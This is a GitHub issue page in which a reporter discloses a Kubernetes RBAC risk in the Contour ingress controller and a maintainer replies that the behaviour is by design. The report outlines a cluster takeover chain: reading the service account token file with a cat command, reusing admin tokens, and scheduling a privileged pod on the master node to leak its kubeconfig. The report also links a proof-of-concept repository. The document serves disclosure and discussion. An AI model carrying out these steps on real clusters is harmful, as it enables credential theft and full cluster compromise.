-
Notifications
You must be signed in to change notification settings - Fork 690
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
A potential risk in contour that could lead to takeover of the cluster #6384
Comments
Hey @HouqiyuA! Thanks for opening your first issue. We appreciate your contribution and welcome you to our community! We are glad to have you here and to have your input on Contour. You can also join us on our mailing list and in our channel in the Kubernetes Slack Workspace |
Thank you for contacting us. Rest assured, your email was received, and I have replied to it directly. Please accept my apologies for the delay! I’ve also attached my response in this issue: The behavior you describe is expected from an ingress controller such as Contour. Users shall be able to create e.g., Ingress and HTTPProxy resources in any namespace and they can reference Secrets in that same namespace. Consider the example given on page https://projectcontour.io/docs/1.28/config/tls-termination/ where HTTPProxy in namespace "default" refers to TLS secret "testsecret" in "default" namespace. Similarly, these two resources can be created in "my-own-namespace" and Contour shall be able to process them as well, without modification of the RBAC rules. The current RBAC rules given in Contour example deployment manifest reflect the access permissions needed to implement the ingress APIs. This is a reasonable configuration considering the above functionality, and I do not consider this to be an issue. Additionally, Contour provides an optional component: Gateway Provisioner. It acts as a Kubernetes operator, and it can dynamically provision Gateways (Contour + Envoy). The functionality requires permissions to create Deployments and DaemonSets. See https://projectcontour.io/docs/1.28/config/gateway-api/#dynamic-provisioning. That said, there is an option for users to deploy Contour in a more restricted environment, where the cluster-wide access to Secrets is NOT acceptable. This reflects the more granular RBAC rules which you mentioned as mitigation. In this use case, the administrator choses to "sacrifice" some of the functionality offered by Contour, with the exchange of being able to "harden" the RBAC permissions granted for Contour. It would allow using Role/RoleBinding instead of their cluster-wide variants. See option "--watch-namespaces=<ns,ns>" https://projectcontour.io/docs/1.28/configuration/#serve-flags and https://projectcontour.io/docs/1.28/deploy-options/#running-multiple-instances-of-contour. There are always risks associated with any permissions, like you have pointed out. Each user must consider if this design is acceptable or not - while considering also that cluster-wide ingress controller and operator is an extremely commonly used and a widely accepted design in Kubernetes ecosystem. |
Dear Team Members:
Greetings! Our team is very interested in your project and we recently identified a potential RBAC security risk while doing a security assessment of your project. Therefore, we would like to report it to you and provide you with the relevant details so that you can fix and improve it accordingly.I have reported the relevant problem to your team's private email ([email protected]) a few days ago, I am not sure whether your team has received it, so I raise this issue here. I hope you will forgive me if there is anything wrong.
Details:
In this Kubernetes project, there exists a ClusterRole that has been granted list secrets high-risk permissions. These permissions allow the role to list confidential information across the cluster. An attacker could impersonate the ServiceAccount bound to this ClusterRole and use its high-risk permissions to list secrets information across the cluster. By combining the permissions of other roles, an attacker can elevate the privileges and further take over the entire cluster.
we constructed the following attack vectors.
First, you need to get a token for the ServiceAccount that has this high-risk privilege. If you are already in a Pod and have this override, you can directly run the following command to get the token: cat /var/run/secrets/kubernetes.io/serviceaccount/ token. If you are on a node other than a Pod, you can run the following command to get the kubectl describe secret .
Use the obtained token information to authenticate with the API server. By including the token in the request, you can be recognized as a legitimate user with a ServiceAccount and gain all privileges associated with the ServiceAccount. As a result, this ServiceAccount identity can be used to list all secrets in the cluster.
We give two ways to further utilize ServiceAccount Token with other privileges to take over the cluster:
Method 1: Elevation of Privilege by Utilizing ServiceAccount Token Bound to ClusterAdmin
Directly use a Token with the ClusterAdmin role permissions that has the authority to control the entire cluster. By authenticating with this token, you can gain full control of the cluster.
Method 2: Create Privileged Containers with ServiceAccount Token with create pods permission You can use this ServiceAccount Token to create a privileged container that mounts the root directory and schedules it to the master node in a taint-tolerant way, so that you can access and leak the master node's kubeconfig configuration file. In this way you can take over the entire cluster.
For the above attack chain we have developed exploit code and uploaded it to github: https://github.com/HouqiyuA/k8s-rbac-poc
Mitigation methods are explored:
Carefully evaluate the permissions required for each user or service account to ensure that it is following the principle of least privilege and to avoid over-authorization.
If list secrets is a required permission, consider using more granular RBAC rules. Role Binding can be used to grant list secrets permissions instead of ClusterRole, which restricts permissions to specific namespaces or resources rather than the entire cluster.
Isolate different applications into different namespaces and use namespace-level RBAC rules to restrict access. This reduces the risk of privilege leakage across namespaces
Looking forward to hearing from you and discussing this risk in more detail with us, thank you very much for your time and attention.
Best wishes.
HouqiyuA
The text was updated successfully, but these errors were encountered: